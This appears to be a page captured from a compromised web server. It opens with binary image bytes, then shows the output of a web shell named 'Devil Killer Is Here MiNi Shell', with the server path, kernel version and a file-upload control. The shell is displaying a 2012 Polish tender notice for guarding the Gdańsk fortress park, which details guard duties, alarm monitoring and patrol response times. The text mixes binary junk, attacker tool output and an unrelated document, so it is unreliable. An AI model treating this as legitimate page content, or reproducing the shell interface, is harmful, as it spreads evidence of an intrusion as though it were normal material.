JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120116/13670-N-2012.html

<p class="kh_header"><b>Gdańsk: ZP/02/2012 Usługi ochrony obiektów i mienia oraz osób przebywających na terenie Parku Kulturowego Fortyfikacji Miejskich Twierdza Gdańsk             w Gdańsku</b><br>
<b>Numer ogłoszenia: 13670 - 2012; data zamieszczenia: 16.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Park Kulturowy Fortyfikacji Miejskich "Twierdza Gdańsk" Jednostka Budżetowa Gminy Miasta Gdańsk , ul. Gradowa 6, 80-802 Gdańsk, woj. pomorskie, tel. 58 300 08 42, faks 58 742 15 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hewelianum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/02/2012 Usługi ochrony obiektów i mienia oraz osób przebywających na terenie Parku Kulturowego Fortyfikacji Miejskich Twierdza Gdańsk             w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest realizacja świadczenia polegająca na wykonaniu usługi ochrony obiektów i mienia oraz osób przebywających na terenie Parku Kulturowego Fortyfikacji Miejskich Twierdza Gdańsk, w granicach wg załącznika nr A do SIWZ - mapka poglądowa. Ogólna charakterystyka obszaru wraz z opisem zainstalowanych systemów alarmowych i monitoringu zawiera załącznik nr B do SIWZ.

3.2.	Realizacja przedmiotu zamówienia będzie wykonywana przez: 
3.2.1.	dwóch pracowników ochrony posiadających wykształcenie średnie oraz licencję I stopnia, sprawnych fizycznie z odpowiednią wiedzą z zakresu wykonywanych zadań oraz doświadczenie i predyspozycje do oceny zagrożeń i podejmowania odpowiednich czynności przeciwdziałających w przypadku wystąpienia niekorzystnych zdarzeń i taki podział obowiązków, że jeden z pracowników ochrony będzie pełnił służbę całodobowo w dyżurce wyposażonej w urządzenia monitoringu i systemy alarmowe oraz środki łączności przez cały okres trwania umowy, zaś drugi pracownik będzie patrolował teren PKFM pieszo lub na skuterze w godzinach otwarcia wystaw w godz.8.00 - 17.00 ( od wtorku do niedzieli) począwszy od 1 czerwca do 31 grudnia 2012r tzn. przez siedem miesięcy w 2012 roku;
      3.2.2    grupę patrolowo-interwencyjną o czasie dojazdu w godz. 8:00 - 19:00 nie dłuższym niż 10 minut, a w godzinach od 19:00 - 8:00 nie dłuższym niż 5 minut, w przypadkach jakichkolwiek zagrożeń, spowodowanych wywołanym sygnałem z systemu alarmowego lub na zgłoszone wezwanie pracownika ochrony pełniącego służbę.

3.3.	Obowiązki pracownika ochrony 
(możliwość zamiany funkcji między pracownikami w czasie trwania służby). 
Pracownik dozorujący systemy alarmowe i monitoring zobowiązany jest do:
3.3.1.	wykonywania czynności ochrony obiektów i mienia, od poniedziałku do niedzieli całodobowo, polegających na ciągłym obserwowaniu terenu i wnętrz obiektów poprzez systemy: monitoringu, sygnalizacji włamania i napadu oraz p.poż.;
3.3.2.	zawiadamiania centrum nadzorującego Wykonawcy o wystąpieniu sytuacji kryzysowej lub zagrożenia w chronionym obszarze, celem wezwania patrolu interwencyjnego, stanowiącego doraźne wsparcie pracownika patrolu;
3.3.3.	przeciwdziałania przez powiadomienie pracownika patrolu i wyznaczonego pracownika Zamawiającego oraz odpowiednich służb, o przypadkach wystąpienia sytuacji kryzysowej i zagrożenia na chronionym terenie takich jak: awarie, pożar i inne zdarzenie losowe, kradzież z włamaniem, wybuch lub zagrożenie wybuchem, rabunek podejmując działania zabezpieczające mienie Zamawiającego;
3.3.4.	współdziałanie z pracownikiem patrolującym dla ochrony obiektów i mienia z zewnątrz jak i w wewnątrz, przed próbami włamania, dewastacji, uszkodzenia kradzieży oraz nadzór nad bezpieczeństwem osób przebywających zarówno w obiektach zamkniętych jak i na terenie Parku;
3.3.5.	należytego przechowywania powierzonych kluczy od chronionych obiektów;
3.3.6.	prowadzenia książki pełnienia służby, w której odnotowuje przebieg służby;
3.3.7.	zapoznania się z rozmieszczeniem i obsługą głównych wyłączników prądu, instalacji ppoż., zaworów wodnych itp.;
3.3.8.	pełnej znajomość topografii chronionych obiektów i mienia - rozkład obiektów, budynków alejek, dróg ewakuacyjnych itp.;
3.3.9.	wykonywania innych niż powyżej czynności zleconych przez upoważnionego pracownika Zamawiającego pod warunkiem, że mieszczą się one w zakresie obowiązków stanowiących zakres niniejszej umowy.
Pracownik patrolu zobowiązany jest do:
3.3.10.	Wykonywania obchodów chronionego obszaru zgodnie z wytycznymi zawartymi w Planie ochrony opracowanym przez Wykonawcę i zatwierdzonym przez Zamawiającego;
3.3.11.	Otwierania i zamykania wystaw multimedialnych, mieszczących się w obiektach Wysokiego     i Niskiego Czoła Kurkowego oraz Poterny z Zespołem Laboratorium i inne;
3.3.12.	współdziałania za pośrednictwem dozorującego i osobistych środków łączności z centrum nadzoru Wykonawcy dla powiadomienia o zaistniałych zagrożeniach w chronionym obszarze, celem wezwania patrolu interwencyjnego, stanowiącego jego wsparcie;
3.3.13.	zamykania wyznaczonych pomieszczeń oraz aktywowanie systemów ochrony tam zainstalowanych;
3.3.14.	dokonywania w trakcie wykonywanych obchodów sprawdzenia prawidłowego zabezpieczenia drzwi, okien, krat oraz powiadamiania dozorującego  i wyznaczonego pracownika Zamawiającego o stwierdzonych nieprawidłowościach oraz podjęcie działań zmierzających do zabezpieczenia zagrożonego miejsca
3.3.15.	zapoznania się z rozmieszczeniem i obsługą głównych wyłączników prądu, instalacji ppoż., zaworów wody itp.;
3.3.16.	pełnej znajomości topografii chronionych obiektów i mienia - rozkład obiektów, budynków alejek, dróg ewakuacyjnych itp.;
3.3.17.	posiadać uprawnienia do kierowania skuterem;

3.4.	Wykonawca w ramach wykonania przedmiotu zamówienia zobowiązany jest do:
3.4.1.	postępowania z należytą starannością, a w szczególności przyjęcia na siebie obowiązków       w zakresie dozoru oraz ochrony obiektów i  mienia realizowanego w ramach ww. środków;
3.4.2.	opracowanie szczegółowej procedury telefonicznego powiadamiania o sygnałach i interwencjach z lokalnego systemu alarmowego, osoby upoważnionej przez Zamawiającego, dotyczącej wydawania poleceń i odwoływania doraźnej grupy interwencyjnej poprzez hasło odwoławczo - indentyfikacyjne i przedłożenia go do akceptacji Zamawiającemu;
3.4.3.	współdziałania z właściwą terenową jednostką policji i straży miejskiej w zakresie bezpieczeństwa i ochrony mienia;
3.4.4.	wyposażenie pracownika ochrony w jednolity ubiór, niezbędne środki przymusu bezpośredniego (np. paralizator), skuteczne środki łączności, środki techniczne (tj. skuter-motorynka, latarka, itp.) oraz materiały biurowe i paliwo do pojazdu dla patrolu;
3.4.5.	opracowania projektu Planu ochrony dla ochranianych obiektów i przedłożenia go do akceptacji Zamawiającemu;
3.4.6.	sprawowania nadzoru nad wszystkimi zagadnieniami merytorycznymi wynikającymi z realizacji przedmiotu zamówienia oraz sprawdzania wykonywania obowiązków ochrony w porozumieniu z osobą wyznaczoną przez Zamawiającego;
3.4.7.	zachowania w tajemnicy wszelkich informacji, które mają lub mogą mieć wpływ na stan bezpieczeństwa Zamawiającego w czasie obowiązywania umowy oraz po jej rozwiązaniu;
3.4.8.	protokolarnego przejęcia od Zamawiającego kluczy do chronionych obiektów oraz zainstalowanych urządzeń alarmowych i monitorujących do obsługi i użytkowania na czas trwania umowy;
3.5.	Wykonawca w ramach realizacji usługi, zobowiązany jest do wykonywania czynności konserwacji, administrowania i utrzymania sprawności systemów alarmowych i monitoringu, wraz z zakupem niezbędnych materiałów (koszty związane z zakupem, dostawą i montażem drobnych części, których wartość nie przekroczy kwoty 5.000,00 zł. brutto w całym okresie realizacji umowy (dotyczy również realizacji umów zawartych przez Wykonawcę dla dokonywania okresowych przeglądów CSP tzn. Centralny System Ppoż. z czujkami jonizacyjnymi z izotopem promieniotwórczym-Ameryk 241). Wszelkie czynności dokonane w powyższych systemach zostaną odnotowane w prowadzonym przez Wykonawcę rejestrze konserwacji systemu. Rejestr  znajdować się będzie w siedzibie Zamawiającego. Wykonawca pokryje wszelkie koszty wynikające z nieprawidłowego wykonania umowy.
3.6.	Wykonawca ponosi odpowiedzialność za szkodę wynikającą z niewykonania, nienależytego wykonania lub wykonania z  nienależytą starannością obowiązków w zakresie ochrony na zasadach określonych w kodeksie cywilnym. 
3.7.	Zamawiający udostępni Wykonawcy pomieszczenie dla pracowników ochrony. Pomieszczenie wyposażone będzie w biurko, krzesła, stanowisko systemu alarmowego i monitoringu oraz telefon stacjonarny. Ponadto Zamawiający udostępni dwie szafki ubraniowe, zamykane na klucz.
Docelowo dyżurka ochrony będzie zlokalizowana w pomieszczeniach wartowni przy poternie do Baterii Moździerzy. Obecnie obiekt jest rewitalizowany w ramach prac objętych etapem IB. Planowane przekazanie pomieszczeń do użytku nastąpi w czerwcu 2012 r. Obecnie dyżurka znajduje się w pomieszczeniach socjalnych Kaponiery Południowej.
3.8.	Wykonawca w ramach realizacji usługi zobowiązany będzie do:
3.8.1.	całodobowej, od poniedziałku do niedzieli ochrony obiektów i mienia poprzez kontrolę wysyłanych sygnałów alarmowych z systemów Zamawiającego, odbieranych w siedzibie Wykonawcy, w jego centrum nadzorującym. Wykonawca w celu realizacji usługi w ww. sposób zobowiązany jest do podłączenia do własnego centrum nadzorującego, sygnałów wychodzących z systemów alarmowych zainstalowanych w obiektach Zamawiającego. Wykonawca musi przejmować sygnały tzn. uzbrojenia systemów i wyłączenia systemów. W momencie uruchomienia się czyli tzn. załączenia się któregokolwiek z alarmów, należy taki stan traktować jako naruszenie strefy chronionej i wówczas Wykonawca zobowiązany jest do odpowiedniego zareagowania, czyli wysłania w to miejsce grupy interwencyjnej. Jej zadaniem jest wykonanie czynności opisanych w punkcie 3.
3.8.2.	Dwóch pracowników ochrony, którzy czynności opisane w punkcie 2 będą realizować w siedzibie Zamawiającego od poniedziałku do niedzieli całodobowo przez cały okres trwania umowy oraz patrolując od wtorku do niedzieli w godzinach otwarcia wystaw, zaczynając tę pracę od dnia 01 czerwca do 31 grudnia 2012 roku. Zatrudnieni pracownicy ochrony muszą posiadać licencję I stopnia i dużą sprawność fizyczną. Wykonawca na podstawie podanej w załączniku nr A do SIWZ (mapka poglądowa) wielkości terenu, zobowiązany jest dostosować odpowiednie osoby do należytego wykonania czynności opisanych w punkcie 2. Wykonawca będzie ponosić odpowiedzialność za należytą realizację przedmiotu zamówienia.
Zamawiający nie dopuszcza do wykonywania ww. czynności pracowników ochrony Wykonawcy bez licencji pierwszego  stopnia.
3.9.	Cały okres realizacji usługi nie może przekroczyć 9 687 roboczogodzin, tj. od dnia wprowadzenia Wykonawcy na chroniony teren do 31 grudnia 2012r..
3.10.	Zaleca się by wykonawca dokonał wizji lokalnej terenu i jego otoczenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, iż Wykonawca posiada aktualną koncesję na wykonywanie usługi ochrony osób i mienia wydaną przez właściwy organ, na podstawie przepisów ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 r., Nr 145, poz. 1221 ze zm.); Ponadto należy wykazać spełnienie tego warunku składając oświadczenie wg. wzoru stanowiącego załącznik nr 2.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że powyższy warunek spełnia każdy z Wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy, w tym okresie wykonał lub wykonuje co najmniej trzy usługi odpowiadające swoim rodzajem przedmiotowi zamówienia, w tym, co najmniej jedną na obiektach zabytkowych - świadczenie usługi ochrony mienia obiektów,  na kwotę co najmniej 100.000,00 zł brutto, ze wskazaniem ich wartości, przedmiotu, dat wykonania i odbiorcy, ponadto należy dołączyć dokument np. protokół odbioru lub referencje, potwierdzający należyte ich wykonanie według wzoru stanowiącego załącznika nr 4 .
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, iż wykonawca dysponuje (lub będzie dysponować) skuterem i co najmniej jednym samochodem patrolowym oraz środkami łączności dla pracownika pełniącego służbę na chronionym terenie, według wzoru stanowiącego załącznik     nr 5;
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, że wykonawca dysponuje (lub będzie dysponować) minimum dwoma pracownikami ochrony, którzy na zmianę będą pełnili służbę na chronionym terenie, posiadają odpowiednie licencje (I stopnia) pracowników ochrony uprawniające do wykonania powierzonych czynności, według wzoru stanowiącego załącznik nr 6. 
 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać, iż wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 300.000,00 zł.
W przypadku wygaśnięcia polisy w trakcie okresu wykonywania przedmiotu zamówienia Wykonawca zobowiązany jest do ponownego ubezpieczenia się i przedłożenia stosownego dokumentu Zamawiającemu.
 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jako obowiązkowy dokument należy dołączyć aktualny odpis z działalności gospodarczej -  w przypadku wykonawców prowadzących jednoosobową działalność gospodarczą  lub wspólników spółki cywilnej.  Załączony do oferty wypis  będzie miał na celu potwierdzenie, iż osoby podpisujące ofertę lub pełnomocnictwo, posiadają uprawnienia do reprezentowania wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1.	Wszelkie zobowiązania wynikające z realizacji przedmiotu umowy, a spoczywające na Wykonawcy oraz Zamawiającym zostały zawarte w załączniku nr 7 do SIWZ - Istotne postanowienia umowy (wzór umowy).
16.2.	Zamawiający na podstawie art. 144 przewiduje następujące warunki dokonania zmian treści zawartej umowy z wyłonionym Wykonawcą:
a)	zmiana nazwy, NIP, Regonu Wykonawcy, jeżeli nie powoduje to zmiany Wykonawcy, 
b)	zmiana osoby koordynujących realizację umowy,
c)	zmiana wysokości miesięcznego wynagrodzenia za realizację przedmiotu umowy o ustawową zmianę stawki podatku VAT.

16.3.	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hewelianum.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Park Kulturowy Fortyfikacji Miejskich Twierdza Gdańsk
ul. Gradowa 6,
